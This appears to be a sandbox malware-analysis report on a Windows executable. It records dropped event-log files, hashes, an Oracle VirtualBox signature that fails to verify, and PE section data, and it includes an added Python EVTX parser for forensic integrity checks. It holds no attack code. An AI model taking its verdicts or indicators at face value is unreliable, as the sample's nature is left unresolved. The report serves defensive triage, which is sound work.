                                      Preview:ElfChnk.z...............z...................@B..@D.....y.....................................................................;.......................(.......(...0.......0..=........................................3...)...................(...............................1..........i0..........]...f...C.......Q...?......................../..............(.......M...F...............f....................3..&......................................................../..................................6...............**..H...........7...............-.&...............................................................<.......T.....!................@7.......w.3.....04.................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l......6.......*...............v...P.r.o.t.e.c.t.i.o.n.M.a.n.a.g.e.m.e.n.t.......w.m.i.p.r.v.s.e...e.x.e.......".%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.W.i
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):3.8087925092526325
                                      Encrypted:false
                                      SSDEEP:384:Fh9h1hvh+h/h8hBhHFhKJhFhxhShxdh6h0hhhThah+hXhFhjh8hdhehrchHhGhvF:F/eCu7jg
                                      MD5:AA17B591FB49AAE70E2FDA0A4E29A233
                                      SHA1:BEC6E44E22A3BA270A9CFB62C7E6EA7D17CB3C4C
                                      SHA-256:A2BCE7FFA058FC98D852E68182755E8F53B17AA13C832B06FD4687AF6025BB63
                                      SHA-512:BDA1B574C861BD7BC6CD6ED9DFA22165D090A08CAAA22D406D5365DE80207770B4C64B700156D4765DB3205E5BD9F05E7129B206AA04E608E3CD469E44F846AE
                                      Malicious:false
                                      Preview:ElfChnk.............................................dv.&.....................................................................C.;............................................=...........................................................................................................................f...............?...........................m...................M...F.......................f.......................................................................A.......................................&...........**..H...........:..P.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):3.8807169826709864
                                      Encrypted:false
                                      SSDEEP:384:1hsV80VUVAOV+8VPVRV8VuV4VCVlViVLVbVhV9V8VcVMVXUg7/TP5uc8WfJ5S0Gd:1/Mfg7/TP5ucrk0G9G9SAMLgM
                                      MD5:064E49AC92987291E981ADB98DCBA198
                                      SHA1:F61B1497809498EC96D19F83B286177E51A67885
                                      SHA-256:D347274F9AEB33C419AF04A170FE151DDEA3245DA52C4B838A1B5531FFB1EBC2
                                      SHA-512:E50E19A729CD6DAB2306FE36455675938098A3459C9006127CD9A7D29D548109083176B3E1694A6E855260AE7C89F0FF9EF60F44BBC420256F07903FF96AD44F
                                      Malicious:false
                                      Preview:ElfChnk..................................... #...$..T"......................................................................h..d................&...........................=...........................................................................................................................f...............?...........................m...................M...F.......................v...............................................................................................................&...........**..P...........~.nP.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):3.6633174586145385
                                      Encrypted:false
                                      SSDEEP:768:c2iNZ5Pu7HjHgU/PA4nzPv48vrAQ3noAYoFJrDf04rfIcbj04rfPHU0jLg40gvPP:R
                                      MD5:F39C76A8FC3F0F9C8113E55EFDE95043
                                      SHA1:4B0B10FAE8F4177EFD271851FCCA4DEB04D7206D
                                      SHA-256:92FF8AEA6304F3C76EBE3FE6ACC11AAA4BA785CDA108BF0DE77F5681E4BAB5EC
                                      SHA-512:CC9E8A6D9D3A49DFC0700289CD730998E8A7FC85FD173E95DEC63D1706EC9E1C0CB263A98479249AE1BC1791740241550E5901A5C458FED5C011C8F5D21DBCC3
                                      Malicious:false
                                      Preview:ElfChnk.........T...............T...................v..........................................................................................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F.......................v...............................................................................................................&...........**..@...........^..K.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 153, DIRTY
                                      Category:dropped
                                      Size (bytes):98688
                                      Entropy (8bit):3.0674599562280402
                                      Encrypted:false
                                      SSDEEP:768:AK2aSb+oY4pY+GhjYsx+Oa9rs4b6l3Ju6FWORIk5QHCMjAy/RBKkdD98XIA7K2aN:Xw
                                      MD5:6094AA9502825079EBF495AD9C3ACA97
                                      SHA1:7D11E3D59833170BF2480892F8906F8F039EA944
                                      SHA-256:4A38FBE94A3819BED941E6D51FDF6A5A26AE4D9039CC0D4FA850E674746D94A2
                                      SHA-512:AB1D6FBAA45183A07DD7363A2640519E028F40333EB9B1EA1B5E044ADBFF71DFD678899022E73E0BAF4C8650998D5DFD06B16904710B0909D3D68E5A66B9E5AF
                                      Malicious:false
                                      Preview:ElfFile........................................................................................................................[ElfChnk.j...............j...........................?......................................................................F..%................*...........................=...........................................................................................................................f...............?...........................m...................M...F...................................................................................................................................................**..X...j.......x^v.{............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):4.242930031881895
                                      Encrypted:false
                                      SSDEEP:384:ph/BwBeabuSBwBTBwBlBwB1BwBPBwBXBwB+BwB6BwBWBwBUBwBSBwBUBwBeBwBFX:p7abRi+DFLVLZVN
                                      MD5:38C0FBCA2A34F3DD78D292B4A6E10C87
                                      SHA1:00626EF5F25CDEDC9AC2210234E62ADDA943517E
                                      SHA-256:F4A786DFDFDF53A60C89D3D9690C20F878B6383A61C7300815FC6FE7F850C0CD
                                      SHA-512:1FFBD35D282021B43BE7C44162AC91CE396384D3EBA8D63B85FAF138BC6CC91BDDBBF23A48A11BA5B382176BC7A3DDFE5DE8121ACC7BC996EC69BCBCCE49E5D5
                                      Malicious:false
                                      Preview:ElfChnk.........................................@....k......................................................................5{.............................................=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................'...........u...................................................**..`...........d.12.a............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.5509093890179249
                                      Encrypted:false
                                      SSDEEP:384:ihErUEyUEYUE9UEOUE5UEdTUEgUEdHUEtUEzUEUUElZUEkUEsUE8UElUEeUEoUE9:ie4Y3
                                      MD5:99897A421122019E38AFD3B6235F8A03
                                      SHA1:4FB8942FF9460B9EF08F46CCD18BFE8DA3069263
                                      SHA-256:7776E5B09F9125AFA0EFA6ED75A9707AC43B179A679F44E0F5A87FB4CBFA977F
                                      SHA-512:75A28ECFB67075F956C129D4DAC38BB0F8730B5BCDCD292B655803553DEA26E444A1192F652C653E9239D39DBFA46817F4476E5167DB2E5DF29076A1A3B20E90
                                      Malicious:false
                                      Preview:ElfChnk......................................E..hG..z..w......................................................................H.................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F.......................&...................................................................................1.......................................**................................&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):4.176100082151436
                                      Encrypted:false
                                      SSDEEP:384:NFRvLoyoAjoKuoPfFDG0ocMtnnEHKQYLoLo1ZoUwo8MtXAo8Mt7oIuEgo8Mtqfom:PBBl
                                      MD5:0DA901C6028EC1132501EAD2AD5A86B4
                                      SHA1:663B2CBA78442914FE420D58F7F229BBE6ED1AE0
                                      SHA-256:177E53BDBC05974D8755EF31E3F76F418C7C25FDCE7B44B8C54198411E9D7B9B
                                      SHA-512:62C4DB34D1D6C4019CB36A34DA44BED84FDABBA816B1EE2B3C286738558403DD7EB68B65F0540F36FCB67B0EFA0A0016FB8160542DAB9E881CC9D7F8C828FCE6
                                      Malicious:false
                                      Preview:ElfChnk.........................................8...P........................................................................w..........'...........s...h...............N...=...................................................N...............................................w.......B.......................;...................................i...........).......M...`...:...........................................................................................................................................&...**..8............+.............+7.&........+7.&.mQ..S...A.M.......A..A...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....j...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):2480
                                      Entropy (8bit):3.935016658895314
                                      Encrypted:false
                                      SSDEEP:48:M+2Lk/6jTUGSTUMUBaQKp5AlhPZlf0xKi+yFB58y78gCKuKh:KOmTU5TUMUBo6Vf0xXB58y7bCtW
                                      MD5:B6570B055FC21150FD2DE1312C34E5AA
                                      SHA1:9701E12B4F0EE8CA23D314C9FAC0307F66CAA9B9
                                      SHA-256:E065D511AC3921E5F0A6F6D436BE3131B7E024BB3C41C693655DD10C237BE870
                                      SHA-512:39014DE3E960E0D9ED0BFC1D15DFA892D315886268ACA328CDDCDA8E91AED6F9E21D0456A142CF518ABBE3EA3C8AD4D35349B684709F3865AD88754BC08652D4
                                      Malicious:false
                                      Preview:ElfChnk.....................................(........V......................................................................B_.K....................s...h...............?...=...................................................N...................................`...........w.......>.......................S...................................e...........).......M...A...:.......................................&.......................V...........................................,...................................**..............}.02..........`~..V.......`~... !X..)............A......M...s....j.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....G........A..............F=.......S.e.r.v.i.c.e. .C.o.n.t.r.o.l. .M.a.n.a.g.e.r.F......&.{.5.5.5.9.0.8.d.1.-.a.6.d.7.-.4.6.9.5.-.8.e.1.e.-.2.6.9.3.1.d.2.0.1.2.f.4.}..........`...E.v.e.n.t.S.o.u.r.c.e.N.a.m.e.......S.e.r.v.i.c.e. .C.o.n.t.r.o.l. .M.a.n.a.g.e.r..A...........................
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):27536
                                      Entropy (8bit):3.8130179832121898
                                      Encrypted:false
                                      SSDEEP:384:B9v49vS9vk9v7i9vR9ve9vJl9vJeqOdqOjqOJqOxBqOmqOOqOXqOc:L42cKjaRHRehPVbCKD4
                                      MD5:620193084B1A93183D75EF6E59204B8F
                                      SHA1:2FF0AB400831E6DF7DE1B29C52EED795F94B526D
                                      SHA-256:0CC5F4A2C676292D4E6C015E0DB5FB02DE625ED60C1C613C8C1F30D1B1CD8826
                                      SHA-512:A0C6F454141A897181A13DF1EF784BE5FADA264BF03498F019FAA12E512C2F764E749F8816D025C1F676192F850D2AE2AB2F71568DE2D0B0A5BF4151590A7D07
                                      Malicious:false
                                      Preview:ElfChnk......... ...............0...........(...0...%.n.....................................................................d...................S.......................{...=...................................................................................\...................................................................................s...................M.......c...........................................................................................&...........................................,.......**..`...!..........,..............&.....................................................................................!.....X..............,............!..............w.)C,...................R.e.g.i.s.t.r.y...S.t.a.r.t.e.d.....P.r.o.v.i.d.e.r.N.a.m.e.=.R.e.g.i.s.t.r.y.......N.e.w.P.r.o.v.i.d.e.r.S.t.a.t.e.=.S.t.a.r.t.e.d...........S.e.q.u.e.n.c.e.N.u.m.b.e.r.=.1...........H.o.s.t.N.a.m.e.=.C.o.n.s.o.l.e.H.o.s.t.......H.o.s.t.V.e.r.s.i.o.n.=.5...1...1.7.1.3.4...1.......H.o.s.t.I.d.=
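The files dropped by C:\Windows\System32\svchost.exe above are Windows event log data rather than attacker payloads: the 65536-byte files whose preview starts with ElfChnk are single EVTX chunks flushed by the Event Log service (libmagic reports them as plain "data" because the ElfFile header is absent), and the 98688-byte file is a complete log with an ElfFile header in front of its chunks, reported as "2 chunks (no. 1 in use), next record no. 153, DIRTY". DIRTY only means the file header was not flushed after the last write, which is normal for a live log; the stronger integrity signal a forensic reviewer wants is whether each chunk's header CRC32 and event-record CRC32 still match its contents. The Python below is an added example and not part of this analysis report or of any tool it names: it parses the ElfFile and ElfChnk headers, verifies both CRC32s, walks the event record headers (the "**" record magic visible in the previews) and flags truncated chunks. It does not decode the BinXML payloads. Because the report gives hashes but not the files, the block builds a constructed sample of the same shape (two chunks, chunk no. 1 in use, next record 153, DIRTY); its record IDs, FILETIME values and payload bytes are assumptions.

```python
"""Parse EVTX 'ElfFile' headers and 'ElfChnk' chunks with the standard library.
Verifies the CRC32s, reports the DIRTY/FULL flags and walks event record
headers; BinXML payloads are not decoded. Offsets follow the public EVTX
format description (libyal documentation)."""
import struct
import zlib
from datetime import datetime, timedelta, timezone

FILE_MAGIC = b"ElfFile\x00"
CHUNK_MAGIC = b"ElfChnk\x00"
RECORD_MAGIC = b"\x2a\x2a\x00\x00"      # "**\0\0", the '**' seen in the previews
FILE_HEADER_BLOCK = 0x1000              # 4096-byte header block, chunks follow it
CHUNK_SIZE = 0x10000                    # 65536 bytes, the size of the dropped chunk files
FLAG_DIRTY, FLAG_FULL = 0x1, 0x2


def crc32(b):
    return zlib.crc32(b) & 0xFFFFFFFF


def filetime(ft):
    # Windows FILETIME: 100 ns ticks since 1601-01-01 UTC
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_file_header(buf):
    if buf[:8] != FILE_MAGIC:
        raise ValueError("not an ElfFile header")
    first_chunk, last_chunk, next_record = struct.unpack_from("<QQQ", buf, 8)
    _hdr_size, minor, major, _block, n_chunks = struct.unpack_from("<IHHHH", buf, 32)
    flags, stored = struct.unpack_from("<II", buf, 120)
    return {"first_chunk": first_chunk, "last_chunk": last_chunk,
            "next_record": next_record, "version": (major, minor), "chunks": n_chunks,
            "dirty": bool(flags & FLAG_DIRTY), "full": bool(flags & FLAG_FULL),
            "crc_ok": crc32(buf[:120]) == stored}   # file checksum covers bytes 0..119


def parse_chunk(buf):
    """buf is one 64 KiB chunk, e.g. one of the bare 'ElfChnk' files listed above."""
    if buf[:8] != CHUNK_MAGIC:
        raise ValueError("not an ElfChnk chunk")
    first_num, last_num, first_id, last_id = struct.unpack_from("<QQQQ", buf, 8)
    _hdr_size, _last_rec_off, free_off, rec_crc = struct.unpack_from("<IIII", buf, 40)
    _flags, hdr_crc = struct.unpack_from("<II", buf, 120)
    truncated = free_off > len(buf)          # chunk was cut short on disk
    end = min(free_off, len(buf))
    records, off = [], 512                   # records start after the 512-byte chunk header
    while off + 28 <= end and buf[off:off + 4] == RECORD_MAGIC:
        size, rec_id, ft = struct.unpack_from("<IQQ", buf, off + 4)
        if size < 28 or off + size > end:
            break
        size_copy = struct.unpack_from("<I", buf, off + size - 4)[0]   # trailing size copy
        records.append({"id": rec_id, "written": filetime(ft), "size": size,
                        "size_ok": size == size_copy})
        off += size
    return {"record_numbers": (first_num, last_num), "record_ids": (first_id, last_id),
            "free_space_offset": free_off, "truncated": truncated,
            # the chunk header CRC skips bytes 120..127 (flags and the checksum itself)
            "hdr_crc_ok": crc32(buf[:120] + buf[128:512]) == hdr_crc,
            "records_crc_ok": not truncated and crc32(buf[512:free_off]) == rec_crc,
            "records": records}


def parse_evtx(data):
    hdr = parse_file_header(data[:FILE_HEADER_BLOCK])
    chunks, off = [], FILE_HEADER_BLOCK
    while off + 512 <= len(data) and data[off:off + 8] == CHUNK_MAGIC:
        chunks.append(parse_chunk(data[off:off + CHUNK_SIZE]))
        off += CHUNK_SIZE
    return hdr, chunks


# --- constructed sample input (assumed values, not taken from the report) ------
def build_record(rec_id, ft, payload):
    size = 24 + len(payload) + 4             # header + payload + trailing size copy
    return RECORD_MAGIC + struct.pack("<IQQ", size, rec_id, ft) + payload + struct.pack("<I", size)


def build_chunk(records, first_num, first_id):
    data = b"".join(records)
    hdr = bytearray(512)
    hdr[:8] = CHUNK_MAGIC
    last = len(records) - 1
    struct.pack_into("<QQQQ", hdr, 8, first_num, first_num + last, first_id, first_id + last)
    struct.pack_into("<IIII", hdr, 40, 128, 512 + len(data) - len(records[-1]),
                     512 + len(data), crc32(data))
    struct.pack_into("<I", hdr, 124, crc32(bytes(hdr[:120]) + bytes(hdr[128:512])))
    return (bytes(hdr) + data).ljust(CHUNK_SIZE, b"\x00")


def build_file_header(n_chunks, last_chunk, next_record, flags):
    hdr = bytearray(FILE_HEADER_BLOCK)
    hdr[:8] = FILE_MAGIC
    struct.pack_into("<QQQ", hdr, 8, 0, last_chunk, next_record)
    struct.pack_into("<IHHHH", hdr, 32, 128, 1, 3, FILE_HEADER_BLOCK, n_chunks)  # v3.1
    struct.pack_into("<I", hdr, 120, flags)
    struct.pack_into("<I", hdr, 124, crc32(bytes(hdr[:120])))
    return bytes(hdr)


def build_sample():
    """Two chunks, chunk no. 1 in use, next record 153, DIRTY: the shape of the
    98688-byte log above, with made-up record IDs, timestamps and payloads."""
    t0 = 132_900_000_000_000_000             # constructed FILETIME (early 2022)
    rec = lambda i: build_record(i, t0 + i * 10_000_000, b"\x0f\x01\x01\x00" * 3)
    return (build_file_header(2, 1, 153, FLAG_DIRTY)
            + build_chunk([rec(i) for i in range(1, 101)], 1, 1)
            + build_chunk([rec(i) for i in range(101, 153)], 101, 101))


if __name__ == "__main__":
    header, chunks = parse_evtx(build_sample())
    print(header)
    for c in chunks:
        print(c["record_ids"], "hdr_crc", c["hdr_crc_ok"], "rec_crc", c["records_crc_ok"],
              "records", len(c["records"]), "first", c["records"][0]["written"])
```

To check a dropped chunk file from a sandbox run, pass its bytes straight to parse_chunk; for a full log, pass the file to parse_evtx. A chunk whose records_crc_ok is False while hdr_crc_ok is True has had record bytes modified after the Event Log service last wrote the chunk header, which is worth far more attention than the DIRTY flag.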
                                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):3444
                                      Entropy (8bit):5.011954215267298
                                      Encrypted:false
                                      SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                      MD5:B133A676D139032A27DE3D9619E70091
                                      SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                      SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                      SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                      Malicious:false
                                      Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                                      File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                      Entropy (8bit):7.644002604978999
                                      TrID:
                                      • Win64 Executable (generic) (12005/4) 74.95%
                                      • Generic Win/DOS Executable (2004/3) 12.51%
                                      • DOS Executable Generic (2002/1) 12.50%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                      File name:file.exe
                                      File size:10264640
                                      MD5:eee7b971e0b76a0df56bdac2ac2fa343
                                      SHA1:c80f9d9de5d0dff115bbb7638554dade321d7c65
                                      SHA256:ecd60313ba990f1300b37db4064977e83f109fdf93a728cf434106c1b5b5a2d5
                                      SHA512:fffd216c820b3be324ac72a46c50683b42218deaf95c219670c3f44c091424e8ed5fc42b28f4aab46e8024a52cbe4ca989031ca3641536f3fae0a2b5f4f79e85
                                      SSDEEP:98304:AScdwkEObD07UX4SIf6Ky9UBMJs52fvaUhOAllh3uJZbZSvHzmmkvgDlWBixnxCa:Ald3Z0I2T0gAfCbZSvTlRXqbtci+
                                      TLSH:29A6D06D86866FE6EB880AF3491D47B6DEE21DF425E7E13180F8DF3325FA8800395195
                                      File Content Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......d...............&.....\...*.............@....................................$.....`... ............................
                                      Icon Hash:3271ccd4b2e07106
                                      Entrypoint:0x1400014b0
                                      Entrypoint Section:.text
                                      Digitally signed:true
                                      Imagebase:0x140000000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                      Time Stamp:0x6482B51E [Fri Jun 9 05:14:06 2023 UTC]
                                      TLS Callbacks:0x40010560, 0x1, 0x40010530, 0x1
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f7505c167603909b7180406402fef19e
                                      Signature Valid:false
                                      Signature Issuer:CN=DigiCert Assured ID Code Signing CA-1, OU=www.digicert.com, O=DigiCert Inc, C=US
                                      Signature Validation Error:The digital signature of the object did not verify
                                      Error Number:-2146869232
                                      Not Before, Not After
                                      • 3/18/2019 5:00:00 PM 3/23/2022 5:00:00 AM
                                      Subject Chain
                                      • CN=Oracle Corporation, OU=Virtualbox, O=Oracle Corporation, L=Redwood Shores, S=CA, C=US
                                      Version:3
                                      Thumbprint MD5:2C3567A8535342474E8B4C4BC12317CB
                                      Thumbprint SHA-1:6F474206BCBB391BB82BA9E5DC0302DEF37AEBBE
                                      Thumbprint SHA-256:B6D977A471725F37DE725D31A36D4BE7CA6D0DABEB7F1F1F597E43045B83ABBE
                                      Serial:05308B76AC2E15B29720FB4395F65F38
                                      Instruction
                                      dec eax
                                      sub esp, 28h
                                      dec eax
                                      mov eax, dword ptr [009C1545h]
                                      mov dword ptr [eax], 00000001h
                                      call 00007FA828A254CFh
                                      nop
                                      nop
                                      dec eax
                                      add esp, 28h
                                      ret
                                      nop dword ptr [eax]
                                      dec eax
                                      sub esp, 28h
                                      dec eax
                                      mov eax, dword ptr [009C1525h]
                                      mov dword ptr [eax], 00000000h
                                      call 00007FA828A254AFh
                                      nop
                                      nop
                                      dec eax
                                      add esp, 28h
                                      ret
                                      nop dword ptr [eax]
                                      dec eax
                                      sub esp, 28h
                                      call 00007FA828A3DAE4h
                                      dec eax
                                      test eax, eax
                                      sete al
                                      movzx eax, al
                                      neg eax
                                      dec eax
                                      add esp, 28h
                                      ret
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      dec eax
                                      lea ecx, dword ptr [00000009h]
                                      jmp 00007FA828A257E9h
                                      nop dword ptr [eax+00h]
                                      ret
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      nop
                                      dec eax
                                      lea eax, dword ptr [009C74A9h]
                                      dec eax
                                      lea edx, dword ptr [eax+21h]
                                      mov byte ptr [eax], 00000000h
                                      dec eax
                                      add eax, 01h
                                      dec eax
                                      cmp eax, edx
                                      jne 00007FA828A25806h
                                      ret
                                      dec eax
                                      lea eax, dword ptr [009C7451h]
                                      dec eax
                                      lea edx, dword ptr [eax+18h]
                                      mov word ptr [eax], 0000h
                                      dec eax
                                      add eax, 02h
                                      dec eax
                                      cmp eax, edx
                                      jne 00007FA828A25804h
                                      ret
                                      dec eax
                                      lea eax, dword ptr [009C7417h]
                                      dec eax
                                      lea edx, dword ptr [eax+14h]
                                      mov word ptr [eax], 0000h
                                      dec eax
                                      add eax, 02h
                                      dec eax
                                      Name                                  Virtual Address  Virtual Size  Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT          0x9ca000         0xa34         .idata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE        0x9cd000         0xa80         .rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x9c4000         0x1230        .pdata
                                      IMAGE_DIRECTORY_ENTRY_SECURITY        0x9c6000         0x4040
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC       0x9ce000         0x330         .reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_TLS             0x9c2000         0x28          .rdata
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_IAT             0x9ca28c         0x250         .idata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                      Name    Virtual Address  Virtual Size  Raw Size   Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
                                      .text   0x1000           0x1aa20       0x1ac00    False     0.4646429614485981   data       6.160137509897198   IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .data   0x1c000          0x9a26e0      0x9a2800   unknown   unknown              unknown    unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rdata  0x9bf000         0x4270        0x4400     False     0.38338694852941174  data       4.987899244906076   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
